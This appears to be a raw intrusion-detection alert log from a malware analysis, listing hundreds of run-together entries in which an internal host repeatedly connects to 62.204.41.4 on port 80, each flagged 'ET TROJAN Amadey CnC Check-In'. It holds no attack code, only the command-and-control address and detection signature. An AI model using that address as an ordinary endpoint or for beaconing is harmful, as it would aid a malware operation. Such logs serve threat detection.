                                                        192.168.2.562.204.41.449909802027700 02/06/23-14:17:47.051765TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450237802027700 02/06/23-14:19:16.017120TCP2027700ET TROJAN Amadey CnC Check-In5023780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450139802027700 02/06/23-14:18:49.109386TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450209802027700 02/06/23-14:19:07.475846TCP2027700ET TROJAN Amadey CnC Check-In5020980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450175802027700 02/06/23-14:18:59.121879TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449847802027700 02/06/23-14:17:29.282944TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449749802027700 02/06/23-14:16:58.580580TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450016802027700 02/06/23-14:18:16.944191TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450114802027700 02/06/23-14:18:42.789843TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450212802027700 02/06/23-14:19:08.785162TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450273802027700 02/06/23-14:19:24.721440TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450077802027700 02/06/23-14:18:33.758096TCP2027700ET TROJAN Amadey CnC Check-In5007780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450170802027700 02/06/23-14:18:57.930319TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449945802027700 02/06/23-14:17:57.866706TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449839802027700 02/06/23-14:17:27.377568TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450167802027700 02/06/23-14:18:57.212252TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450072802027700 02/06/23-14:18:31.495683TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450049802027700 02/06/23-14:18:24.878641TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450008802027700 02/06/23-14:18:14.977537TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450204802027700 02/06/23-14:19:06.078376TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449744802027700 02/06/23-14:16:57.374562TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449940802027700 02/06/23-14:17:56.613135TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449998802027700 02/06/23-14:18:10.629964TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449752802027700 02/06/23-14:16:59.309366TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449822802027700 02/06/23-14:17:23.172087TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450150802027700 02/06/23-14:18:53.180275TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450080802027700 02/06/23-14:18:34.462036TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449870802027700 02/06/23-14:17:37.486432TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450044802027700 02/06/23-14:18:23.661387TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449917802027700 02/06/23-14:17:48.955073TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450245802027700 02/06/23-14:19:17.964918TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449875802027700 02/06/23-14:17:38.674670TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449757802027700 02/06/23-14:17:00.537791TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450024802027700 02/06/23-14:18:18.856589TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450085802027700 02/06/23-14:18:35.682373TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449867802027700 02/06/23-14:17:36.742778TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450195802027700 02/06/23-14:19:03.888104TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449711802027700 02/06/23-14:16:33.781093TCP2027700ET TROJAN Amadey CnC Check-In4971180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449895802027700 02/06/23-14:17:43.567435TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449965802027700 02/06/23-14:18:02.723607TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450122802027700 02/06/23-14:18:44.731116TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450232802027700 02/06/23-14:19:14.756016TCP2027700ET TROJAN Amadey CnC Check-In5023280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449729802027700 02/06/23-14:16:44.339849TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449981802027700 02/06/23-14:18:06.537805TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450229802027700 02/06/23-14:19:14.024750TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450057802027700 02/06/23-14:18:26.865834TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449904802027700 02/06/23-14:17:45.863998TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449732802027700 02/06/23-14:16:48.097239TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449830802027700 02/06/23-14:17:25.114847TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449986802027700 02/06/23-14:18:07.762955TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450265802027700 02/06/23-14:19:22.827156TCP2027700ET TROJAN Amadey CnC Check-In5026580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449937802027700 02/06/23-14:17:55.913689TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449862802027700 02/06/23-14:17:34.385168TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450060802027700 02/06/23-14:18:27.627658TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450190802027700 02/06/23-14:19:02.698642TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449695802027700 02/06/23-14:16:29.833366TCP2027700ET TROJAN Amadey CnC Check-In4969580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449978802027700 02/06/23-14:18:05.789921TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449724802027700 02/06/23-14:16:39.798184TCP2027700ET TROJAN Amadey CnC Check-In4972480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450011802027700 02/06/23-14:18:15.710647TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450224802027700 02/06/23-14:19:12.834482TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450052802027700 02/06/23-14:18:25.625284TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450159802027700 02/06/23-14:18:55.306572TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449765802027700 02/06/23-14:17:02.563683TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450029802027700 02/06/23-14:18:20.040672TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450130802027700 02/06/23-14:18:46.681001TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450260802027700 02/06/23-14:19:21.606828TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449932802027700 02/06/23-14:17:53.704513TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449890802027700 02/06/23-14:17:42.348322TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449802802027700 02/06/23-14:17:18.144256TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449760802027700 02/06/23-14:17:01.327724TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449973802027700 02/06/23-14:18:04.598157TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449728802027700 02/06/23-14:16:43.785940TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449985802027700 02/06/23-14:18:07.516141TCP2027700ET TROJAN Amadey CnC Check-In4998580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449731802027700 02/06/23-14:16:47.855991TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449798802027700 02/06/23-14:17:17.167240TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449887802027700 02/06/23-14:17:41.597625TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450249802027700 02/06/23-14:19:18.949648TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449896802027700 02/06/23-14:17:43.821533TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449737802027700 02/06/23-14:16:52.313327TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450252802027700 02/06/23-14:19:19.663270TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449826802027700 02/06/23-14:17:24.159355TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450163802027700 02/06/23-14:18:56.264797TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450191802027700 02/06/23-14:19:02.948025TCP2027700ET TROJAN Amadey CnC Check-In5019180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450261802027700 02/06/23-14:19:21.842035TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450093802027700 02/06/23-14:18:37.648522TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449859802027700 02/06/23-14:17:33.007738TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450004802027700 02/06/23-14:18:13.908824TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450102802027700 02/06/23-14:18:39.827581TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450258802027700 02/06/23-14:19:21.108804TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450089802027700 02/06/23-14:18:36.683035TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449960802027700 02/06/23-14:18:01.488614TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449868802027700 02/06/23-14:17:36.986362TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449709802027700 02/06/23-14:16:33.287572TCP2027700ET TROJAN Amadey CnC Check-In4970980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449703802027700 02/06/23-14:16:31.801911TCP2027700ET TROJAN Amadey CnC Check-In4970380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449810802027700 02/06/23-14:17:20.127758TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449957802027700 02/06/23-14:18:00.788642TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450092802027700 02/06/23-14:18:37.397614TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450179802027700 02/06/23-14:19:00.072207TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449827802027700 02/06/23-14:17:24.402563TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449756802027700 02/06/23-14:17:00.296702TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450233802027700 02/06/23-14:19:15.000212TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449929802027700 02/06/23-14:17:52.146320TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449797802027700 02/06/23-14:17:16.911714TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450032802027700 02/06/23-14:18:20.769004TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449740802027700 02/06/23-14:16:53.015336TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449994802027700 02/06/23-14:18:09.678156TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450121802027700 02/06/23-14:18:44.477396TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450162802027700 02/06/23-14:18:56.026170TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450073802027700 02/06/23-14:18:32.799222TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449900802027700 02/06/23-14:17:44.895342TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449941802027700 02/06/23-14:17:56.852297TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450217802027700 02/06/23-14:19:11.137962TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449953802027700 02/06/23-14:17:59.850998TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449944802027700 02/06/23-14:17:57.633329TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450119802027700 02/06/23-14:18:44.008779TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449855802027700 02/06/23-14:17:31.349237TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450036802027700 02/06/23-14:18:21.758203TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450208802027700 02/06/23-14:19:07.190881TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449769802027700 02/06/23-14:17:03.541604TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449938802027700 02/06/23-14:17:56.145928TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450220802027700 02/06/23-14:19:11.858797TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450045802027700 02/06/23-14:18:23.896931TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449883802027700 02/06/23-14:17:40.633559TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450051802027700 02/06/23-14:18:25.382182TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449916802027700 02/06/23-14:17:48.720590TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450134802027700 02/06/23-14:18:47.648864TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449785802027700 02/06/23-14:17:07.425626TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449972802027700 02/06/23-14:18:04.364385TCP2027700ET TROJAN Amadey CnC Check-In4997280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450106802027700 02/06/23-14:18:40.803738TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449966802027700 02/06/23-14:18:02.959272TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450017802027700 02/06/23-14:18:17.179298TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449712802027700 02/06/23-14:16:34.380434TCP2027700ET TROJAN Amadey CnC Check-In4971280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449801802027700 02/06/23-14:17:17.902350TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449925802027700 02/06/23-14:17:50.890187TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450236802027700 02/06/23-14:19:15.762067TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449842802027700 02/06/23-14:17:28.111422TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449753802027700 02/06/23-14:16:59.551732TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449699802027700 02/06/23-14:16:30.811358TCP2027700ET TROJAN Amadey CnC Check-In4969980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449772802027700 02/06/23-14:17:04.254514TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450188802027700 02/06/23-14:19:02.215108TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450023802027700 02/06/23-14:18:18.602365TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450064802027700 02/06/23-14:18:28.682743TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450147802027700 02/06/23-14:18:52.469914TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450151802027700 02/06/23-14:18:53.414300TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449979802027700 02/06/23-14:18:06.054835TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449921802027700 02/06/23-14:17:49.926933TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450068802027700 02/06/23-14:18:29.946527TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450246802027700 02/06/23-14:19:18.198358TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449743802027700 02/06/23-14:16:53.921247TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449771802027700 02/06/23-14:17:04.019414TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449899802027700 02/06/23-14:17:44.645815TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450010802027700 02/06/23-14:18:15.475260TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450123802027700 02/06/23-14:18:44.976744TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449838802027700 02/06/23-14:17:27.131716TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450184802027700 02/06/23-14:19:01.259062TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450105802027700 02/06/23-14:18:40.574553TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449700802027700 02/06/23-14:16:31.043767TCP2027700ET TROJAN Amadey CnC Check-In4970080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449856802027700 02/06/23-14:17:31.586279TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449833802027700 02/06/23-14:17:25.956224TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449874802027700 02/06/23-14:17:38.440488TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449894802027700 02/06/23-14:17:43.316977TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449911802027700 02/06/23-14:17:47.534707TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450274802027700 02/06/23-14:19:24.966329TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450256802027700 02/06/23-14:19:20.620519TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450078802027700 02/06/23-14:18:33.994128TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449715802027700 02/06/23-14:16:35.302872TCP2027700ET TROJAN Amadey CnC Check-In4971580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449733802027700 02/06/23-14:16:51.368597TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450096802027700 02/06/23-14:18:38.394554TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450156802027700 02/06/23-14:18:54.587906TCP2027700ET TROJAN Amadey CnC Check-In5015680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450228802027700 02/06/23-14:19:13.781550TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449805802027700 02/06/23-14:17:18.884453TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449781802027700 02/06/23-14:17:06.429230TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449710802027700 02/06/23-14:16:33.533909TCP2027700ET TROJAN Amadey CnC Check-In4971080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450115802027700 02/06/23-14:18:43.044125TCP2027700ET TROJAN Amadey CnC Check-In5011580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450133802027700 02/06/23-14:18:47.416110TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450174802027700 02/06/23-14:18:58.884943TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449828802027700 02/06/23-14:17:24.646925TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450027802027700 02/06/23-14:18:19.567097TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449751802027700 02/06/23-14:16:59.053794TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449846802027700 02/06/23-14:17:29.052087TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450205802027700 02/06/23-14:19:06.323850TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449705802027700 02/06/23-14:16:32.323528TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449962802027700 02/06/23-14:18:02.000570TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449990802027700 02/06/23-14:18:08.739973TCP2027700ET TROJAN Amadey CnC Check-In4999080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450113802027700 02/06/23-14:18:42.545396TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449702802027700 02/06/23-14:16:31.544827TCP2027700ET TROJAN Amadey CnC Check-In4970280192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449730802027700 02/06/23-14:16:44.596890TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449876802027700 02/06/23-14:17:38.908848TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450143802027700 02/06/23-14:18:51.490212TCP2027700ET TROJAN Amadey CnC Check-In5014380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449818802027700 02/06/23-14:17:22.140346TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.450146802027700 02/06/23-14:18:52.228128TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449693802027700 02/06/23-14:16:29.330240TCP2027700ET TROJAN Amadey CnC Check-In4969380192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449698802027700 02/06/23-14:16:30.576133TCP2027700ET TROJAN Amadey CnC Check-In4969880192.168.2.562.204.41.4
                                                        192.168.2.562.204.41.449989802027700 02/06/23-14:18:08.504518TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.562.204.41.4
